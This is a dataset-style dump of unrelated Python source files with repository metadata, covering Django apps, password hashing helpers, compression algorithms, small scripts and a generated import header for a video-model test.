with open(f'{output_dir}/fake_texts.txt', 'w') as f:
f.write('\n'.join(fake_text_strs))
fake_text_ints = remove_special_tokens(fake_text_ints)
torch.save(fake_text_ints, f'{output_dir}/fake_texts.pth')
print('DONE!')
def parse_args():
parser = ArgumentParser()
parser.add_argument('-w', dest='weights_path', type=str, required=True, help='path to weights')
parser.add_argument('-o', dest='output_dir', type=str, required=True, help='output folder name')
parser.add_argument('--truncation_threshold', type=float, default=None, help='threshold for the truncation trick, default is no truncation.')
parser.add_argument('-n', dest='num_samples', type=int, default=5000, help='number of samples to generate')
return parser.parse_args()
if __name__ == '__main__':
run(parse_args())
|
[
"[email protected]"
] | |
df3ee582d21448c9b6a5b04bf4e9f86b698c7454
|
85ce8600a5857ab8bd19f425b25fb1ac3a6ae137
|
/hashing.py
|
4edf11db744cf34e6e27e432622dd34fea0f8dba
|
[] |
no_license
|
styopazharkov/dontsaypineapple
|
c38c713361f642c9a77f3cde9f40120e26ab960d
|
1e96f5570a61cf45ccdc6a6125e363485ad2e85f
|
refs/heads/master
| 2023-08-25T20:17:33.080680 | 2021-11-07T19:36:45 | 2021-11-07T19:36:45 | 317,384,759 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 915 |
py
|
#### This file contains the hashing helper functions ####
import hashlib, binascii, os
### Hash a password for storing. ###
def hashpass(password):
salt = hashlib.sha256(os.urandom(60)).hexdigest().encode('ascii')
pwdhash = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'),
salt, 100000)
pwdhash = binascii.hexlify(pwdhash)
return (salt + pwdhash).decode('ascii')
### Verify a stored password against one provided by user ###
def verify(provided_password, stored_password):
salt = stored_password[:64]
stored_password = stored_password[64:]
pwdhash = hashlib.pbkdf2_hmac('sha512',
provided_password.encode('utf-8'),
salt.encode('ascii'),
100000)
pwdhash = binascii.hexlify(pwdhash).decode('ascii')
return pwdhash == stored_password
|
[
"[email protected]"
] | |
71b2e819f9b87e7fec810e93dc2fb3d1006ac89d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_combos.py
|
cac18802b80f0f4ecc83aabd2e7d23ba1ed8481a
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 231 |
py
|
from xai.brain.wordbase.nouns._combo import _COMBO
#calss header
class _COMBOS(_COMBO, ):
def __init__(self,):
_COMBO.__init__(self)
self.name = "COMBOS"
self.specie = 'nouns'
self.basic = "combo"
self.jsondata = {}
|
[
"[email protected]"
] | |
7f573440117d22c0ac92c4425d4cb2d7b491ddf6
|
a7baf83cd25be7a9ba95bb43945fab5c17766d5a
|
/search/views.py
|
3ebadf75ff8cbc666f82e42b7049073e32d75ae0
|
[] |
no_license
|
sanjeev-mystical/eCOMMERCE
|
a44829d74749b92b5139629a41f8dee342e62882
|
f5648ebb3a580f466034ccf6c6c41181dbd8de5e
|
refs/heads/master
| 2022-06-08T03:42:01.899611 | 2020-05-05T04:55:27 | 2020-05-05T04:55:27 | 259,207,150 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 671 |
py
|
from django.shortcuts import render
from django.views.generic.list import ListView
from products.models import Product
# Create your views here.
class SearchProductView(ListView):
template_name = 'search/view.html'
def get_context_data(self, *args, **kwargs):
context = super(SearchProductView, self).get_context_data(*args, **kwargs)
context['query'] = self.request.GET.get('q')
return context
def get_queryset(self, *args, **kwargs):
request = self.request
query = request.GET.get('q', None)
if query is not None:
return Product.objects.search(query)
return Product.objects.featured()
|
[
"[email protected]"
] | |
bd6651931aed58d7bfd2c1949c7dea3b99edfd6c
|
b685036280331fa50fcd87f269521342ec1b437b
|
/src/data_mining_demo/py_shuJuWaJue_ruMen_yu_ShiJian/chapter3/demo2.py
|
7e2ee679470b22f9af507b2f12f77a6431309659
|
[] |
no_license
|
chenqing666/myML_DM_Test
|
f875cb5b2a92e81bc3de2a0070c0185b7eacac89
|
5ac38f7872d94ca7cedd4f5057bb93732b5edbad
|
refs/heads/master
| 2022-02-26T01:52:06.293025 | 2019-09-20T06:35:25 | 2019-09-20T06:35:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 175 |
py
|
import pickle
import numpy as np
import pandas as pd
datafile = "./cleanedData.dai"
with open(datafile, 'rb') as file:
dataset = pickle.load(file)
print(dataset.head())
|
[
"[email protected]"
] | |
82812f0cb1ad89fee4e2c4ad453429f5b4e8cc8f
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_118/619.py
|
85060cf54efea0ef148ad0160403ca71cbb9b978
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 596 |
py
|
# -*- coding: utf-8 -*-
import sys
def is_palindrome(num):
s1 = str(num)
s2 = s1[::-1]
return s1 == s2
fair_numbers = []
for i in range(pow(10, 7)+1):
if is_palindrome(i):
num = i*i
if is_palindrome(num):
fair_numbers.append(num)
N = int(sys.stdin.readline())
for T in range(1, N+1):
min_val, max_val = map(int, sys.stdin.readline().strip().split())
ans = 0
for num in fair_numbers:
if num < min_val:
continue
if num > max_val:
break
ans += 1
print 'Case #%(T)s: %(ans)s' % locals()
|
[
"[email protected]"
] | |
f1f0346609c95cd9528fa736d70e63b6a54c6372
|
fe179646f3efc67c7d97e20d8bb23de4649cfd71
|
/ML/recording voice.py
|
8c565b500a537bb9d1a0da5d5f51a75ac24ddf69
|
[] |
no_license
|
Piyush-Ghotkar/DK287_PASUS_BML_MUNJAL_UNIVERSITY
|
dac0a7d40b2ea81e0a4b813b3654372c50b155c6
|
8dd008e45cd4506bae105c2041cf2e18388f9adf
|
refs/heads/master
| 2023-05-12T05:16:18.583087 | 2020-11-11T14:34:21 | 2020-11-11T14:34:21 | 283,998,494 | 0 | 0 | null | 2021-06-02T03:01:13 | 2020-07-31T09:42:09 |
ASP.NET
|
UTF-8
|
Python
| false | false | 492 |
py
|
import speech_recognition as sr #importing the library
r=sr.Recognizer()
with sr.Microphone() as source:
print('Start speaking')
audio = r.listen(source)
#with open('speech.wav','wb') as f:
#f.write(audio.get_wav_data())
print('Done listening, Processing.....')
print(audio)
print(r.recognize_google(audio))
try:
print('Text is:', r.recognize_google(audio))
inp= r.recognize_google(audio)
except:
print('error occured!')
pass
|
[
"[email protected]"
] | |
9fde6b1cc14c9a979633c4f2df97f24dca4d78bb
|
84290c584128de3e872e66dc99b5b407a7a4612f
|
/Supervised Learning with scikit-learn/Preprocessing and pipelines/Centering and scaling.py
|
c21eb26fe58bf9a8d53c990a24d3b0ab871dee0b
|
[] |
no_license
|
BautizarCodigo/DataAnalyticEssentials
|
91eddc56dd1b457e9e3e1e3db5fbbb2a85d3b789
|
7f5f3d8936dd4945ee0fd854ef17f04a04eb7b57
|
refs/heads/main
| 2023-04-11T04:42:17.977491 | 2021-03-21T19:05:17 | 2021-03-21T19:05:17 | 349,784,608 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 504 |
py
|
# Import scale
from sklearn.preprocessing import scale
# Scale the features: X_scaled
X_scaled = scale(X)
# Print the mean and standard deviation of the unscaled features
print("Mean of Unscaled Features: {}".format(np.mean(X)))
print("Standard Deviation of Unscaled Features: {}".format(np.std(X)))
# Print the mean and standard deviation of the scaled features
print("Mean of Scaled Features: {}".format(np.mean(X_scaled)))
print("Standard Deviation of Scaled Features: {}".format(np.std(X_scaled)))
|
[
"[email protected]"
] | |
dc83fcd6ae70daf74c6861eb3265743bad91efb8
|
6a111b290ef2bf08c9a64f9ea72e2cc5c910b0d0
|
/pycrafter4500_stepper-based-master/client side/main.pyw
|
352e3666a7ac67425afd02f1773cbd6bcd420f90
|
[] |
no_license
|
ZhaoxinLee/MagRobotPrinter
|
d5f3cbde4551aac9e819df71902ed57dbcaea463
|
43ceaf7ea5e4d3cb7622c14585250c95876a87ec
|
refs/heads/master
| 2022-09-09T02:17:01.265454 | 2022-08-17T21:38:10 | 2022-08-17T21:38:10 | 195,290,571 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 286 |
pyw
|
import sys
from callbacks import GUI
from PyQt5 import QtWidgets
import warnings
warnings.filterwarnings("ignore")
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
window = GUI()
window.move(150,100)
window.show()
sys.exit(app.exec_())
|
[
"[email protected]"
] | |
9726353f578aad3a94526c5f75342b308e3a2e1c
|
6926bcf24f96568972cfd58b3490fe40c61ae390
|
/sales/migrations/0001_initial.py
|
079b37bde8a1add42e930545014f043664241939
|
[] |
no_license
|
wencong1724427771/Backend-management-system
|
64f597a9be15cd4d70ed8918291c4019c192e123
|
9c78c49098256d5f6dd7672646f14c677e48564a
|
refs/heads/master
| 2023-08-07T15:32:52.045784 | 2021-09-19T02:33:59 | 2021-09-19T02:33:59 | 376,212,971 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 12,806 |
py
|
# Generated by Django 3.2.6 on 2021-08-29 09:51
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
('rbac', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Campuses',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64, verbose_name='校区')),
('address', models.CharField(blank=True, max_length=512, null=True, verbose_name='详细地址')),
],
options={
'verbose_name': '校区表',
'verbose_name_plural': '校区表',
},
),
migrations.CreateModel(
name='ClassList',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('course', models.CharField(choices=[('LinuxL', 'Linux中高级'), ('PythonFullStack', 'Python高级全栈开发')], max_length=64, verbose_name='课程名称')),
('semester', models.IntegerField(verbose_name='学期')),
('price', models.IntegerField(default=10000, verbose_name='学费')),
('memo', models.CharField(blank=True, max_length=100, null=True, verbose_name='说明')),
('start_date', models.DateField(verbose_name='开班日期')),
('graduate_date', models.DateField(blank=True, null=True, verbose_name='结业日期')),
('class_type', models.CharField(blank=True, choices=[('fulltime', '脱产班'), ('online', '网络班'), ('weekend', '周末班')], max_length=64, null=True, verbose_name='班级类型')),
('campuses', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.campuses', verbose_name='校区')),
],
),
migrations.CreateModel(
name='Department',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=32)),
('count', models.IntegerField()),
],
),
migrations.CreateModel(
name='UserInfo',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=16)),
('password', models.CharField(max_length=32)),
('telephone', models.CharField(max_length=11)),
('email', models.EmailField(max_length=254)),
('is_active', models.BooleanField(default=True)),
('depart', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='sales.department')),
('roles', models.ManyToManyField(to='rbac.Role')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Customer',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('qq', models.CharField(help_text='QQ号必须唯一', max_length=64, unique=True, verbose_name='QQ')),
('qq_name', models.CharField(blank=True, max_length=64, null=True, verbose_name='QQ昵称')),
('name', models.CharField(blank=True, help_text='学员报名后,请改为真实姓名', max_length=32, null=True, verbose_name='姓名')),
('sex', models.CharField(blank=True, choices=[('male', '男性'), ('female', '女性')], default='male', max_length=16, null=True, verbose_name='性别')),
('birthday', models.DateField(blank=True, default=None, help_text='格式yyyy-mm-dd', null=True, verbose_name='出生日期')),
('phone', models.CharField(blank=True, max_length=11, null=True, verbose_name='手机号')),
('source', models.CharField(choices=[('qq', 'qq群'), ('referral', '内部转介绍'), ('website', '官方网站'), ('baidu_ads', '百度推广'), ('office_direct', '直接上门'), ('WoM', '口碑'), ('public_class', '公开课'), ('website_luffy', '路飞官网'), ('others', '其它')], default='qq', max_length=64, verbose_name='客户来源')),
('course', multiselectfield.db.fields.MultiSelectField(choices=[('LinuxL', 'Linux中高级'), ('PythonFullStack', 'Python高级全栈开发')], max_length=22, verbose_name='咨询课程')),
('class_type', models.CharField(choices=[('fulltime', '脱产班'), ('online', '网络班'), ('weekend', '周末班')], default='fulltime', max_length=64, verbose_name='班级类型')),
('customer_note', models.TextField(blank=True, null=True, verbose_name='客户备注')),
('status', models.CharField(choices=[('signed', '已报名'), ('unregistered', '未报名'), ('studying', '学习中'), ('paid_in_full', '学费已交齐')], default='unregistered', help_text='选择客户此时的状态', max_length=64, verbose_name='状态')),
('date', models.DateTimeField(auto_now_add=True, verbose_name='咨询日期')),
('last_consult_date', models.DateField(auto_now_add=True, verbose_name='最后跟进日期')),
('next_date', models.DateField(blank=True, null=True, verbose_name='预计再次跟进时间')),
('deal_date', models.DateField(blank=True, null=True)),
('class_list', models.ManyToManyField(blank=True, to='sales.ClassList', verbose_name='已报班级')),
('consultant', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='customers', to='sales.userinfo', verbose_name='销售')),
('introduce_from', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='sales.customer', verbose_name='转介绍自学员')),
],
options={
'verbose_name': '客户信息表',
'verbose_name_plural': '客户信息表',
'ordering': ['id'],
},
),
migrations.CreateModel(
name='CourseRecord',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('day_num', models.IntegerField(help_text='此处填写第几节课或第几天课程...,必须为数字', verbose_name='节次')),
('date', models.DateField(auto_now_add=True, verbose_name='上课日期')),
('course_title', models.CharField(blank=True, max_length=64, null=True, verbose_name='本节课程标题')),
('course_memo', models.TextField(blank=True, max_length=300, null=True, verbose_name='本节课程内容')),
('has_homework', models.BooleanField(default=True, verbose_name='本节有作业')),
('homework_title', models.CharField(blank=True, max_length=64, null=True, verbose_name='本节作业标题')),
('homework_memo', models.TextField(blank=True, max_length=500, null=True, verbose_name='作业描述')),
('scoring_point', models.TextField(blank=True, max_length=300, null=True, verbose_name='得分点')),
('re_class', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.classlist', verbose_name='班级')),
('teacher', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.userinfo', verbose_name='讲师')),
],
options={
'unique_together': {('re_class', 'day_num')},
},
),
migrations.CreateModel(
name='ConsultRecord',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('note', models.TextField(verbose_name='跟进内容...')),
('status', models.CharField(choices=[('A', '近期无报名计划'), ('B', '1个月内报名'), ('C', '2周内报名'), ('D', '1周内报名'), ('E', '定金'), ('F', '到班'), ('G', '全款'), ('H', '无效')], help_text='选择客户此时的状态', max_length=8, verbose_name='跟进状态')),
('date', models.DateTimeField(auto_now_add=True, verbose_name='跟进日期')),
('delete_status', models.BooleanField(default=False, verbose_name='删除状态')),
('consultant', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='records', to='sales.userinfo', verbose_name='跟进人')),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.customer', verbose_name='所咨询客户')),
],
),
migrations.AddField(
model_name='classlist',
name='teachers',
field=models.ManyToManyField(to='sales.UserInfo', verbose_name='老师'),
),
migrations.CreateModel(
name='StudyRecord',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('attendance', models.CharField(choices=[('checked', '已签到'), ('vacate', '请假'), ('late', '迟到'), ('absence', '缺勤'), ('leave_early', '早退')], default='checked', max_length=64, verbose_name='考勤')),
('score', models.IntegerField(choices=[(100, 'A+'), (90, 'A'), (85, 'B+'), (80, 'B'), (70, 'B-'), (60, 'C+'), (50, 'C'), (40, 'C-'), (0, ' D'), (-1, 'N/A'), (-100, 'COPY'), (-1000, 'FAIL')], default=-1, verbose_name='本节成绩')),
('homework_note', models.CharField(blank=True, max_length=255, null=True, verbose_name='作业批语')),
('date', models.DateTimeField(auto_now_add=True)),
('note', models.CharField(blank=True, max_length=255, null=True, verbose_name='备注')),
('homework', models.FileField(blank=True, default=None, null=True, upload_to='', verbose_name='作业文件')),
('course_record', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.courserecord', verbose_name='某节课程')),
('student', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.customer', verbose_name='学员')),
],
options={
'unique_together': {('course_record', 'student')},
},
),
migrations.CreateModel(
name='Enrollment',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('why_us', models.TextField(blank=True, default=None, max_length=1024, null=True, verbose_name='为什么报名')),
('your_expectation', models.TextField(blank=True, max_length=1024, null=True, verbose_name='学完想达到的具体期望')),
('contract_approved', models.BooleanField(default=False, help_text='在审阅完学员的资料无误后勾选此项,合同即生效', verbose_name='审批通过')),
('enrolled_date', models.DateTimeField(auto_now_add=True, verbose_name='报名日期')),
('memo', models.TextField(blank=True, null=True, verbose_name='备注')),
('delete_status', models.BooleanField(default=False, verbose_name='删除状态')),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.customer', verbose_name='客户名称')),
('enrolment_class', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.classlist', verbose_name='所报班级')),
('school', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.campuses')),
],
options={
'verbose_name': '报名表',
'verbose_name_plural': '报名表',
'unique_together': {('enrolment_class', 'customer')},
},
),
migrations.AlterUniqueTogether(
name='classlist',
unique_together={('course', 'semester', 'campuses')},
),
]
|
[
"[email protected]"
] | |
43b8c08aef019d6e918ec740a570488a43396bcf
|
1ebed017fec5d8c7ec9fe11a593f7e42a1e09083
|
/lab_03_11.py
|
ce18050e27ab7c9730b89c193a93bae9535555a5
|
[] |
no_license
|
Captain-on-time/Info-Labs-6
|
714b5b56ff5569fc8da9091df3851a551a2e6b93
|
55a54df614209f8e946d2c497d9fd6537c88d65d
|
refs/heads/main
| 2023-02-20T15:24:31.684267 | 2021-01-24T16:44:38 | 2021-01-24T16:44:38 | 332,487,627 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,145 |
py
|
from heapq import heappush as insert, heappop as pop
class Node:
def init(self):
self.value = None
def createDict(self):
if self.value != None:
return dict([(self.value, "")])
Dict = dict()
if self.left != None:
Dict_l = self.left.createDict()
for i in Dict_l.keys():
Dict_l[i] = '0' + Dict_l[i]
Dict.update(Dict_l)
if self.right != None:
Dict_r = self.right.createDict()
for i in Dict_r.keys():
Dict_r[i] = '1' + Dict_r[i]
Dict.update(Dict_r)
return Dict
def encodeHuffman(fileIn, fileOut):
file_i = open(fileIn, "r")
txt = file_i.read()
file_i.close
symbols = set(txt)
q = []
i = 0
for s in symbols:
count = list(txt).count(s)
insert(q, (count, i, s))
i+=1
while len(q) != 1:
left = pop(q)
right = pop(q)
left_e = None
right_e = None
n = Node()
if not(isinstance(left[-1], Node)):
left_e = Node()
left_e.value = left[-1]
else:
left_e = left[-1]
if not(isinstance(right[-1], Node)):
right_e = Node()
right_e.value = right[-1]
else:
right_e = right[-1]
n.left = left_e
n.right = right_e
p = left[0]+right[0]
insert(q, (p, i, n))
i+=1
Dict = pop(q)[-1].createDict()
file_o = open(fileOut, "w")
for i in Dict.keys():
file_o.write(str(ord(i)) + " " + _dict[i] + " ")
file_o.write('\n')
encoded = ""
for s in txt:
encoded += Dict[s]
file_o.write(encoded)
file_o.close()
print("Huffman: " + str((len(encoded)/(len(txt)*8))*100) + "%")
def decodeHuffman(fileIn, fileOut):
file_i = open(fileIn, "r")
str1 = file_i.readline()
str2 = file_i.readline()
file_i.close
a = str1.split(" ")
Dict = dict()
for i in range(0, len(a), 2):
if a[i] == '\n':
continue
Dict[a[i+1]] = chr(int(a[i]))
s = ""
start = 0
stop = 1
while start < len(str2):
sl = str2[start:stop]
if (Dict.get(sl, "") == ""):
stop += 1
continue
else:
s += _dict.get(sl)
start = stop
stop += 1
file_o = open(fileOut, "w")
file_o.write(s)
file_o.close()
encodeHuffman("text.txt", "text_e_huf.txt")
decodeHuffman("text_e_huf.txt", "text_d_huf.txt")
def bin_l(a, length):
bin_str = bin(a).replace("0b", "")
while len(bin_str) != length:
bin_str = '0' + bin_str
return bin_str
def encodeLZW(fileIn, fileOut):
comb = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N",
"O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c",
"d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r",
"s", "t", "u", "v", "w", "x", "y", "z", " ", "'", "-", ",", ".", ";"]
base_length = 6
file_i = open(fileIn, "r");
txt = file_i.read()
file_i.close()
out = ""
buff = ""
for c in range(0, len(txt)):
buff += txt[c]
if buff in comb:
continue
else:
comb.append(buff)
out += bin_l(comb.index(buff[:len(buff)-1]), base_length)
if (c+1) == len(txt):
out += bin_l(comb.index(txt[c]), base_length)
break
buff = buff[-1:]
if len(comb) > 2**base_length:
base_length += 1
print(comb)
file_o = open(fileOut, "w")
file_o.write(out)
file_o.close()
print("LZW: " + str((len(out)/(len(txt)*8))*100) + "%")
def decodeLZW(fileIn, fileOut):
comb = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N",
"O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c",
"d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r",
"s", "t", "u", "v", "w", "x", "y", "z", " ", "'", "-", ",", ".", ";"]
base_length = 6
file_i = open(fileIn, "r");
txt = file_i.read()
file_i.close()
out = ""
start = 0
while start < len(txt):
cur = int(txt[start:start+base_length], 2)
out += comb[cur]
if start != 0: comb[-1] += comb[cur][0]
comb.append(comb[cur])
start += base_length
if len(comb) > 2**base_length:
base_length += 1
file_o = open(fileOut, "w")
file_o.write(out)
file_o.close()
print(comb)
encodeLZW("text.txt", "text_e.txt")
print("\n")
decodeLZW("text_e.txt", "text_d.txt")
|
[
"[email protected]"
] | |
6712d458cdfadfd2c8461273e0c8f6eccdd02d0f
|
58cef2a341f2a19ea0e8d0e9f3a79a386d9b72cf
|
/manage.py
|
73bee40ef8964a7d5ca6176bba700c87bf2d5681
|
[] |
no_license
|
Ujjawal-Anand/Stackflow
|
9a8a5af4e4c9e0fb9d5322f70413d1906500d085
|
c71bbd8de97566c2773d3b29f669211240a01c42
|
refs/heads/master
| 2022-12-11T00:08:48.619781 | 2020-09-03T16:44:35 | 2020-09-03T16:44:35 | 290,780,334 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 629 |
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'StackFlow.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
e0e9990a35ed37a9ba3a659c967e7ba2811dfa3f
|
c717e0ead7596d7e32ad2c0d2a1a1fd9a50b405e
|
/sqrt-i/XX-01-2021/25-01-2021/decypher.py
|
0c4dfc9cc0cfed332dd1adeb0d90f464a8769e55
|
[] |
no_license
|
tom-xs/CTF_notes
|
6cbf3ba8bdf085c5b51ec1d5a81d5b528bc1b117
|
4926094a86400e6a9895139219a299062c574c29
|
refs/heads/master
| 2023-03-14T06:47:51.347772 | 2021-03-01T00:01:17 | 2021-03-01T00:01:17 | 327,574,415 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 872 |
py
|
def reverse(s):
p1 = ""
#subtrai 5 de cada in
for n in s:
n = ord(n)
n -=5
n = chr(n)
p1+=n
#print(p1)
#cria lista vazia l1
l1 = []
for i in range(7):
l1.append("")
#divide o "p1" em lista
l1[0] = p1[0]
n = int(len(p1)/6)
c = 1
for i in range(1,len(p1[0:]),n):
l1[c] = p1[i:i+n]
c+=1
#reordena "p1" que vira p2
p2 = ""
c = 0
for i in range(len(l1)):
for j in range(len(l1)):
try:
p2+=l1[j][c]
except:
pass
c+=1
#print(p2)
#adiciona 8 a cada char
p3 = ""
for n in p2:
n = ord(n)
n+=8
n=chr(n)
p3+=n
print(p3)
reverse("f`k\\0\kmqd-^40ecokhetbx^\..\o`q_kp`z-!od\.")
|
[
"[email protected]"
] | |
d597d8f7dada7c93d9e4088b7bf43f7a8e2746bf
|
82c78e393266bf2b4cc4a217ae8da7f9d0578bca
|
/pages/models.py
|
a3113708b358ea48f55b07615d59205a8711cc6a
|
[] |
no_license
|
SUXUMI/simpleCMS-django
|
9017453a15c96a1568e4dd15aa9dc9238dd297de
|
1973966365c89c30e7d52c3fcf6409cef4c20807
|
refs/heads/main
| 2023-02-17T16:02:16.070287 | 2021-01-18T07:10:34 | 2021-01-18T07:10:34 | 330,578,145 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 680 |
py
|
from django.db import models
from django.utils import timezone
class Page(models.Model):
title = models.CharField(max_length=255, blank=False)
# slug = models.CharField(max_length=255, unique=True, blank=False)
# https://www.geeksforgeeks.org/slugfield-django-models/
slug = models.SlugField(max_length=64, unique=True)
meta_description = models.CharField(max_length=255)
content = models.TextField(null=True, blank=True)
create_dt = models.DateTimeField(default=timezone.now)
update_dt = models.DateTimeField(auto_now=True)
# https://docs.djangoproject.com/en/2.2/ref/contrib/admin/actions/
def __str__(self):
return self.title
|
[
"[email protected]"
] | |
0a912a7112a0beabf813cc00fba1cdb7c2e3daad
|
d35167f7ab29813d926bd702fa652090556befdf
|
/generated/test_facebookresearch_TimeSformer.py
|
7cf65f94103dda891ae436570da86b4a73b849eb
|
[] |
no_license
|
jansel/pytorch-jit-paritybench
|
65e5311d43daf5065beac52a68488ce188199fa8
|
7e55a422588c1d1e00f35a3d3a3ff896cce59e18
|
refs/heads/master
| 2023-08-12T04:43:16.669114 | 2023-06-08T17:36:32 | 2023-06-08T17:36:32 | 270,464,378 | 35 | 15 | null | 2023-06-08T17:36:34 | 2020-06-07T23:42:50 |
Python
|
UTF-8
|
Python
| false | false | 111,676 |
py
|
import sys
_module = sys.modules[__name__]
del sys
setup = _module
timesformer = _module
config = _module
defaults = _module
datasets = _module
build = _module
cv2_transform = _module
decoder = _module
kinetics = _module
loader = _module
multigrid_helper = _module
ssv2 = _module
transform = _module
utils = _module
video_container = _module
models = _module
batchnorm_helper = _module
build = _module
conv2d_same = _module
custom_video_model_builder = _module
features = _module
head_helper = _module
helpers = _module
linear = _module
losses = _module
nonlocal_helper = _module
operators = _module
optimizer = _module
resnet_helper = _module
stem_helper = _module
video_model_builder = _module
vit = _module
vit_utils = _module
ava_eval_helper = _module
ava_evaluation = _module
label_map_util = _module
metrics = _module
np_box_list = _module
np_box_list_ops = _module
np_box_mask_list = _module
np_box_mask_list_ops = _module
np_box_ops = _module
np_mask_ops = _module
object_detection_evaluation = _module
per_image_evaluation = _module
standard_fields = _module
benchmark = _module
bn_helper = _module
c2_model_loading = _module
checkpoint = _module
distributed = _module
env = _module
logging = _module
lr_policy = _module
meters = _module
metrics = _module
misc = _module
multigrid = _module
multiprocessing = _module
parser = _module
weight_init_helper = _module
visualization = _module
tensorboard_vis = _module
utils = _module
run_net = _module
submit = _module
test_net = _module
train_net = _module
visualization = _module
from _paritybench_helpers import _mock_config, patch_functional
from unittest.mock import mock_open, MagicMock
from torch.autograd import Function
from torch.nn import Module
import abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings
import numpy as np
from torch import Tensor
patch_functional()
open = mock_open()
yaml = logging = sys = argparse = MagicMock()
ArgumentParser = argparse.ArgumentParser
_global_config = args = argv = cfg = config = params = _mock_config()
argparse.ArgumentParser.return_value.parse_args.return_value = _global_config
yaml.load.return_value = _global_config
sys.argv = _global_config
__version__ = '1.0.0'
xrange = range
wraps = functools.wraps
import math
import numpy as np
import random
import torch
import torchvision.io as io
import torch.utils.data
import itertools
from torch.utils.data._utils.collate import default_collate
from torch.utils.data.distributed import DistributedSampler
from torch.utils.data.sampler import RandomSampler
from torch.utils.data.sampler import Sampler
from itertools import chain as chain
import logging
import time
from collections import defaultdict
from functools import partial
import torch.distributed as dist
import torch.nn as nn
from torch.autograd.function import Function
import torch.nn.functional as F
from typing import Tuple
from typing import Optional
from typing import List
from collections import OrderedDict
from copy import deepcopy
from typing import Dict
from typing import Callable
import torch.utils.model_zoo as model_zoo
from torch import nn as nn
from torch import einsum
from torch.nn.modules.module import Module
from torch.nn.modules.activation import MultiheadAttention
from torch.nn import ReplicationPad3d
import copy
import warnings
from itertools import repeat
import functools
from collections import deque
from sklearn.metrics import average_precision_score
from matplotlib import pyplot as plt
from torch import nn
import logging as log
import matplotlib.pyplot as plt
